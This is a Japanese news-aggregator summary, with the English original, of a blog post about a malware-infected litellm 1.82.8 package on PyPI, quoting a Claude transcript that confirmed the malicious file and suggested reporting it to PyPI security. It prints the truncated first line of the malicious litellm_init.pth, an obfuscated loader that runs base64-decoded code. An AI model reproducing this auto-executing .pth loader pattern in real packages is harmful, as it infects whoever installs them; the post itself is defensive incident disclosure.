LiteLLMマルウェア攻撃への分単位の対応
Callum McMahon氏がPyPI上のLiteLLMパッケージにマルウェアが混入していることを発見し、Claudeの助けを借りて脆弱性を確認した上でPyPIセキュリティチームに報告した経緯を、Simon Willison氏がブログ記事で公開した。
キーポイント
PyPIパッケージへのマルウェア混入
AIライブラリ「litellm」のPyPI公式パッケージ(バージョン1.82.8)に悪意のあるコードが含まれており、インストールまたはアップグレードするユーザーが感染する危険性があった。
Claudeを活用した脆弱性確認
Callum McMahon氏はClaudeとの対話を通じてマルウェアの存在を確認し、隔離されたDockerコンテナ内で検証を行った。
迅速なセキュリティ対応
ClaudeがPyPIセキュリティ連絡先(security@pypi.org)を提案し、即時報告が行われた。
サプライチェーン攻撃の実例
オープンソースAIツールの公式リポジトリが攻撃対象となり、開発者エコシステム全体に影響を与える可能性を示した。
影響分析・編集コメントを表示
影響分析
この事件は、AI開発ツールのサプライチェーンが攻撃対象となる新たな脅威を示しており、オープンソースエコシステム全体のセキュリティ対策の重要性を浮き彫りにした。同時に、生成AIがセキュリティ調査の補助ツールとして実用的に活用できる可能性も示唆している。
編集コメント
AI開発の基盤を揺るがすサプライチェーン攻撃の具体例として、業界関係者全員が注視すべきセキュリティインシデント。生成AIが防御ツールとしても活用できる可能性を示した点も興味深い。
Callum McMahon 氏が、PyPI に対して LiteLLM マルウェア攻撃 を報告しました。ここでは、脆弱性を確認し、対応策を決定するために彼が使用した Claude の会話記録(トランスクリプト)を紹介しています。Claude は Docker コンテナ内で悪意のあるコードを確認した後、PyPI のセキュリティ担当者への連絡先アドレスも提案してくれました:
確認済み。現在、隔離された Docker コンテナ内で PyPI から freshly ダウンロードしました。
調査対象:litellm-1.82.8-py3-none-any.whl
発見:litellm_init.pth
サイズ:34628 バイト
最初の 200 文字:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b6decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl...
悪意のある litellm==1.82.8 は、現在 PyPI で稼働中であり、litellm をインストールまたはアップグレードするすべてのユーザーが感染します。これは直ちに security@pypi.org へ報告する必要があります。
Via Hacker News
Tags: pypi, security, ai, generative-ai, llms, claude, supply-chain
原文を表示
My minute-by-minute response to the LiteLLM malware attack
Callum McMahon reported the LiteLLM malware attack to PyPI. Here he shares the Claude transcripts he used to help him confirm the vulnerability and decide what to do about it. Claude even suggested the PyPI security contact address after confirming the malicious code in a Docker container:
Confirmed. Fresh download from PyPI right now in an isolated Docker container:
`
Inspecting: litellm-1.82.8-py3-none-any.whl
FOUND: litellm_init.pth
SIZE: 34628 bytes
FIRST 200 CHARS:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl...
> The malicious litellm==1.82.8 is live on PyPI right now and anyone installing or upgrading litellm will be infected. This needs to be reported to security@pypi.org immediately.
Via [Hacker News](https://news.ycombinator.com/item?id=47531967)
Tags: [pypi](https://simonwillison.net/tags/pypi), [security](https://simonwillison.net/tags/security), [ai](https://simonwillison.net/tags/ai), [generative-ai](https://simonwillison.net/tags/generative-ai), [llms](https://simonwillison.net/tags/llms), [claude](https://simonwillison.net/tags/claude), [supply-chain](https://simonwillison.net/tags/supply-chain)関連記事
今日のまとめ
AI日報で今日の重要ニュースをまとめ読み